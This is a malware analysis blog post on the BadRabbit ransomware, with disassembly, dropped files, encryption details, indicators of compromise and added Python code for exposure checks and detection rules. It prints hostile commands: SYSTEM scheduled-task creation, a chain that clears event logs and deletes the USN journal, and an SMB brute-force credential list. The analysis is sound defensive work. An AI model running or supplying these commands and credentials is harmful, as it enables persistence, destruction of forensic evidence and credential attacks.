“BadRabbit” Ransomware Hits Businesses Across Europe

Trustlook Labs has investigated a ransomware outbreak dubbed “BadRabbit,” which is sweeping public organizations and businesses such as airports, banks and power utilities in Russia, Ukraine, Turkey and Bulgaria.

The malware is disguised as an Adobe Flash Player installer that the victim downloads from a phishing website. The dropper (MD5: fbbdc39af1139aebba4da004475e8839) writes a DLL module to C:\Windows\infpub.dat, which is the main BadRabbit payload, and launches it with the following command line, assembled by wsprintfW from the format string "%ws C:\Windows\%ws,#1 %ws" as the listing below shows:

C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15

0119138A  TEST CX,CX
0119138D  JNZ SHORT BR.01191380
0119138F  PUSH 30C                                 ; /BufSize = 30C (780.)
01191394  LEA ECX,DWORD PTR SS:[EBP-61C]           ; |
0119139A  PUSH ECX                                 ; |Buffer
0119139B  CALL DWORD PTR DS:[]                     ; \GetSystemDirectoryW
011913A1  TEST EAX,EAX
011913A3  JE BR.01191487
011913A9  PUSH BR.01196CF8                         ; /StringToAdd = "\rundll32.exe"
011913AE  LEA EDX,DWORD PTR SS:[EBP-61C]           ; |
011913B4  PUSH EDX                                 ; |ConcatString
011913B5  CALL DWORD PTR DS:[]                     ; \lstrcatW
011913BB  TEST EAX,EAX
011913BD  JE BR.01191487
011913C3  LEA EAX,DWORD PTR SS:[EBP-1258]
011913C9  PUSH EAX                                 ; /Arg1
011913CA  LEA ECX,DWORD PTR SS:[EBP-1254]          ; |
011913D0  CALL BR.011910C0                         ; \BR.011910C0
011913D5  TEST EAX,EAX
011913D7  JE BR.01191487
011913DD  MOV ECX,DWORD PTR SS:[EBP-1258]
011913E3  PUSH EBX
011913E4  MOV EBX,DWORD PTR SS:[EBP-1254]
011913EA  PUSH ECX                                 ; /Arg1
011913EB  CALL BR.01191260                         ; \BR.01191260
011913F0  POP EBX
011913F1  TEST EAX,EAX
011913F3  JE BR.01191487
011913F9  LEA EDX,DWORD PTR SS:[EBP-124C]
011913FF  PUSH EDX                                 ; /
01191400  PUSH BR.01196D40                         ; | = "infpub.dat"
01191405  LEA EAX,DWORD PTR SS:[EBP-61C]           ; |
0119140B  PUSH EAX                                 ; |
0119140C  LEA ECX,DWORD PTR SS:[EBP-C34]           ; |
01191412  PUSH BR.01196D58                         ; |Format = "%ws C:\Windows\%ws,#1 %ws"
01191417  PUSH ECX                                 ; |s
01191418  CALL DWORD PTR DS:[]                     ; \wsprintfW

The malware also drops the files C:\Windows\dispci.exe and C:\Windows\cscc.dat. It creates scheduled tasks (named rhaegal and drogon in the listing below) to execute the dropped file; dispci.exe installs a malicious bootloader.

6C561077  PUSH DWORD PTR SS:[EBP+8]
6C56107A  PUSH EAX
6C56107B  LEA EAX,DWORD PTR SS:[EBP-618]
6C561081  PUSH infpub.6C570028                     ; UNICODE "schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "%ws /C Start \"\" \"%wsdispci.exe\" -id %u "
6C561086  PUSH EAX
6C561087  CALL DWORD PTR DS:[]                     ; USER32.wsprintfW

[...]

6C5682BB  LEA EAX,DWORD PTR SS:[EBP-658]
6C5682C1  PUSH EAX
6C5682C2  LEA EAX,DWORD PTR SS:[EBP-E58]
6C5682C8  PUSH infpub.6C571820                     ; UNICODE "schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00"
6C5682CD  PUSH EAX
6C5682CE  CALL DWORD PTR DS:[]                     ; USER32.wsprintfW
6C5682D4  ADD ESP,14

The malware generates a random key by calling CryptGenRandom, then encrypts that key with an embedded RSA-2048 public key.

The key is then used to encrypt the files on the system with the AES-128 encryption algorithm. The malware encrypts files with the following file extensions:

.3ds, .7z, .accdb, .ai, .asm, .asp, .aspx, .avhd, .back, .bak, .bmp, .brw, .c, .cab, .cc, .cer, .cfg, .conf, .cpp, .crt, .cs, .ctl, .cxx, .dbf, .der, .dib, .disk, .djvu, .doc, .docx, .dwg, .eml, .fdb, .gz, .h, .hdd, .hpp, .hxx, .iso, .java, .jfif, .jpe, .jpeg, .jpg, .js, .kdbx, .key, .mail, .mdb, .msg, .nrg, .odc, .odf, .odg, .odi, .odm, .odp, .ods, .odt, .ora, .ost, .ova, .ovf, .p12, .p7b, .p7c, .pdf, .pem, .pfx, .php, .pmf, .png, .ppt, .pptx, .ps1, .pst, .pvi, .py, .pyc, .pyw, .qcow, .qcow2, .rar, .rb, .rtf, .scm, .sln, .sql, .tar, .tib, .tif, .tiff, .vb, .vbox, .vbs, .vcb, .vdi, .vfd, .vhd, .vhdx, .vmc, .vmdk, .vmsd, .vmtm, .vmx, .vsdx, .vsv, .work, .xls, .xlsx, .xml, .xvd, .zip

The malware skips the files under the following directories:

\Windows
\Program Files
\ProgramData
\AppData
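As an added example (not Trustlook's code), a Python helper that applies the extension list and skipped-directory rules above to decide whether a file falls inside BadRabbit's encryption scope, which is useful for sizing the exposure of a file share. It assumes extension matching is case-insensitive and that a skipped name may appear as any component of the path, since the write-up gives them as bare directory names.

```python
import ntpath

# Target extensions exactly as listed in the write-up.
TARGET_EXTENSIONS = frozenset("""
.3ds .7z .accdb .ai .asm .asp .aspx .avhd .back .bak .bmp .brw .c .cab .cc .cer
.cfg .conf .cpp .crt .cs .ctl .cxx .dbf .der .dib .disk .djvu .doc .docx .dwg .eml
.fdb .gz .h .hdd .hpp .hxx .iso .java .jfif .jpe .jpeg .jpg .js .kdbx .key .mail
.mdb .msg .nrg .odc .odf .odg .odi .odm .odp .ods .odt .ora .ost .ova .ovf .p12
.p7b .p7c .pdf .pem .pfx .php .pmf .png .ppt .pptx .ps1 .pst .pvi .py .pyc .pyw
.qcow .qcow2 .rar .rb .rtf .scm .sln .sql .tar .tib .tif .tiff .vb .vbox .vbs .vcb
.vdi .vfd .vhd .vhdx .vmc .vmdk .vmsd .vmtm .vmx .vsdx .vsv .work .xls .xlsx .xml
.xvd .zip
""".split())

# Directories the write-up says are skipped. Assumption: the name may occur as any
# component of the path (covers C:\Users\<user>\AppData) and is compared case-insensitively.
SKIPPED_DIRS = frozenset(d.lower() for d in ("Windows", "Program Files", "ProgramData", "AppData"))


def would_be_encrypted(path: str) -> bool:
    """True if a file at `path` is in scope as the write-up describes it:
    its extension is targeted and no parent directory is a skipped one."""
    _drive, rest = ntpath.splitdrive(path)
    parts = [p for p in rest.replace("/", "\\").split("\\") if p]
    if not parts:
        return False
    if any(p.lower() in SKIPPED_DIRS for p in parts[:-1]):
        return False
    ext = ntpath.splitext(parts[-1])[1].lower()  # assumption: case-insensitive match
    return ext in TARGET_EXTENSIONS


def at_risk(paths):
    """Filter an inventory of paths (e.g. a share listing) to those that would be encrypted."""
    return sorted(p for p in paths if would_be_encrypted(p))


# Constructed sample inventory, not taken from the write-up.
SAMPLE_PATHS = [
    r"C:\Users\bob\Documents\budget.xlsx",
    r"C:\Users\bob\AppData\Roaming\notes.doc",
    r"C:\Windows\System32\drivers\etc\hosts.bak",
    r"C:\Program Files\App\config.xml",
    r"D:\vms\srv01.vmdk",
    r"E:\share\REPORT.DOCX",
    r"C:\Readme.txt",
    r"C:\Users\bob\photo.gif",
]
```

Note that the ransom note's own .txt extension is not in the list, so Readme.txt stays readable.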

The ransom message Readme.txt is written to the root of each drive.

After the scheduled task reboots the system, a ransom note is shown on screen.

The malware runs wevtutil and fsutil to clear the event logs and delete the NTFS USN change journal:

wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
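As an added example (not Trustlook's code), the command lines documented above (rundll32 loading infpub.dat, the rhaegal and drogon scheduled tasks, and the wevtutil/fsutil chain) turned into detection rules and run over a constructed set of process-creation records. The values filled into the %ws and %u placeholders of the task command lines are assumptions, since the write-up shows only the format strings.

```python
import re

# Constructed process-creation records (host, command line), not real telemetry.
# The first four reproduce the command lines from the write-up with assumed values
# in place of %ws/%u (cmd.exe, a task id, a placeholder for drogon's unknown /TR);
# the last two are benign look-alikes the rules must not flag.
SAMPLE_EVENTS = [
    ("ws01", r"C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15"),
    ("ws01", r'schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 1234 "'),
    ("ws01", r'schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "<TR_PLACEHOLDER>" /ST 14:35:00'),
    ("ws01", r"cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:"),
    ("ws02", r'schtasks /Create /SC DAILY /TN NightlyBackup /TR "C:\Tools\backup.exe" /ST 02:00'),
    ("ws02", r"rundll32.exe shell32.dll,Control_RunDLL"),
]

# Each rule keys on a behaviour from the write-up rather than a file hash, so it
# survives a trivial recompile of the sample.
RULES = {
    # rundll32 invoking export ordinal #1 of infpub.dat, the payload entry point
    "rundll32 executes infpub.dat,#1": re.compile(
        r"rundll32(?:\.exe)?\s+\S*infpub\.dat,#1", re.I),
    # the two task names the sample hardcodes, or any created task that starts dispci.exe
    "schtasks creates rhaegal/drogon task or runs dispci.exe": re.compile(
        r"schtasks\s.*?/Create.*?(?:/TN\s+(?:rhaegal|drogon)\b|dispci\.exe)", re.I),
    # 'wevtutil cl' alone is noisy (admins clear logs too); the sample chains it with
    # USN-journal deletion, so require both in a single command line
    "event logs cleared and USN journal deleted in one command": re.compile(
        r"wevtutil\s+cl\s+\w+.*fsutil\s+usn\s+deletejournal", re.I),
}


def match_rules(cmdline: str) -> list:
    """Return the names of every rule whose pattern matches the command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def scan(events) -> list:
    """Run all rules over (host, cmdline) records and return (host, rule) hits."""
    return [(host, rule) for host, cmd in events for rule in match_rules(cmd)]


if __name__ == "__main__":
    for host, rule in scan(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```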

The malware also attempts to spread to other systems on the network. It uses the following embedded list of usernames and passwords to brute-force logins to other systems over SMB.

Usernames:
alex
netguest
superuser
nasadmin
nasuser
nas
ftpadmin
ftpuser
asus
backup
operator
other user
work
support
manager
rdpadmin
rdpuser
rdp
ftp
boss
buh
root
Test
user-1
User1
User
Guest
Admin
Administrator

Passwords:
god
sex
secret
love
321
123321
uiop
zxcv
zxc321
zxc123
zxc
qwerty123
qwerty
qwert
qwer
qwe321
qwe123
qwe
777
77777
55555
111111
password
test123
admin123Test
Admin123
user123
User123
guest123
Guest123
administrato
Administrato
1234567890
123456789
12345678
1234567
123456
12345
1234
123
test
adminTest
user
guest
administrator

Hashes (MD5)
Trustlook Labs has identified the following hashes associated with BadRabbit:

Dropper:
fbbdc39af1139aebba4da004475e8839

Payload:
1d724f95c61f1055f0d02c2154bbccd3 c:\Windows\infpub.dat
b14d8faf7f0cbcfad051cefe5f39645f c:\Windows\dispci.exe
b4e6d97dafd9224ed9a547d52c26ce02 c:\Windows\cscc.dat

Summary
The ability to spread via SMB makes the BadRabbit ransomware particularly destructive, as it can infect systems across a network very quickly and easily. It is further proof that ransomware, with its monetary incentives, remains the prevailing trend in malware developed by criminal hackers. Thankfully, Trustlook’s antivirus engine can effectively detect ransomware attacks and protect our customers.
